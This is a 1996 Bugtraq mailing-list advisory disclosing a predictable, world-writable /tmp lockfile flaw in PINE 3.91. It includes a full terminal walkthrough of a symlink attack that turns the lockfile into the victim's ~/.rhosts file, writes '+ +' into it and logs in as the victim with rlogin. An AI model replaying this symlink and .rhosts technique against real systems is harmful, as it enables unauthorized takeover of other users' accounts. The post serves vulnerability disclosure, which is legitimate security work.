From proff Tue Aug 27 10:29:48 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA06805 for best-of-security; Tue, 27 Aug 1996 10:29:48 +1000 Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id JAA01638 for ; Tue, 27 Aug 1996 09:50:59 +1000 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <23288-23819>; Mon, 26 Aug 1996 19:48:26 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id TAA27995; Mon, 26 Aug 1996 19:48:36 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 299579 for BUGTRAQ@NETSPACE.ORG; Mon, 26 Aug 1996 19:41:08 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id TAA27191 for ; Mon, 26 Aug 1996 19:40:45 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from litterbox.org (litterbox.org [205.247.190.19]) by netspace.org (8.7/8.6.12) with ESMTP id TAA26531 for ; Mon, 26 Aug 1996 19:36:06 -0400 Received: from localhost (hamors@localhost) by litterbox.org (8.7.5/8.6.9) with SMTP id TAA01869; Mon, 26 Aug 1996 19:35:29 -0400 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: "Sean B. Hamor" Message-ID: Date: Mon, 26 Aug 1996 19:35:05 -0400 Reply-To: Bugtraq List Sender: proff From: "Sean B. Hamor" Subject: [BUG] Vulnerability in PINE X-cc: New Hack City Projects , Raven , Bill Arcand , "(d)(M)(v)" To: Multiple recipients of list BUGTRAQ -----BEGIN PGP SIGNED MESSAGE----- Monday, August 26, 1996 The Litterbox Sean B. Hamor Note: I'm not sure whether or not information this has been previously released. I found this earlier this evening while poking around, and apologize if I've just found an old bug. I verified the existence of this bug in PINE 3.91, however it had been fixed in 3.95. I don't know if 3.92, 3.93, or 3.94 are effected. Even though this bug has been fixed, I thought I'd still release this because many Linux installations still use PINE 3.91, and most machines I have accounts on still use PINE 3.91. Synopsis: A problem exists in PINE where the name used for the lockfile in /tmp/ is easily guessable. From various testing on a few machines, the name of the lockfile is static for each user who launches PINE. Note that the lockfile is only created when there is new mail in the user's INBOX. This wouldn't normally be a problem, however this lockfile is created mode 666 in /tmp/. The static lockfile name can be easily attained by doing an ls in /tmp/ when it has been determined that the user is running PINE and has new email. Exploit: By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors Verification: This vulnerability has been tested on the following platforms with the following versions of PINE: Linux Slackware 3.0 (1.2.13): PINE 3.91 FreeBSD 2.1.0-RELEASE: PINE 3.91 Problem has been fixed in PINE 3.95 under Linux Slackware 3.0 (1.2.13): Log entry: Aug 26 19:10:58 litterbox syslog: SECURITY PROBLEM: lock file /tmp/.302.f5a4 is a symbolic link User warning: [SECURITY ALERT: symbolic link on lock name!] [Can't open mailbox lock, access is readonly] EOF Finger hamors@ishiboo.com /\_/\ mailto:hamors@litterbox.org for PGP public key block. ( o.o ) http://www.ishiboo.com/~hamors/ alt.litterbox, The Home of TOCA > ^ < http://www.litterbox.org/~hamors/ Hi! I'm a .signature virus! Add me to your .signature and join in the fun! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMiI0rjU6HlxZIJ+FAQES9Qf/UYcqT/L9iEVwre6MS0Uokaw7npEqM8iZ zFZF5KLBGFOSCE36V+2VG2/7rhR24Q4J9A51VyaCC3kzQyS++wr5IqaBl9AGxpIG zSk2APmUnyi5NmUYoRnRIwFP8ptg15Bz3syxqsLegPYJdZW1r7DeA4rG47xi0lgG abNNfDta1PQYbxRh+C6yQ9ey6p31/o59CDackH/ene9brqqQXZBrt/fnn4SnNHiP EQyjcwkyTkFHkCQmfCmT1zJzlVfF6sj36der7boIsu9EAFsqpSwzI1/zZCvFgzoZ kpH4/srgo3tIFOcTFSoescJQE+wynwMK45Ab0VYjpPAvOBwqld6hyg== =hejk -----END PGP SIGNATURE-----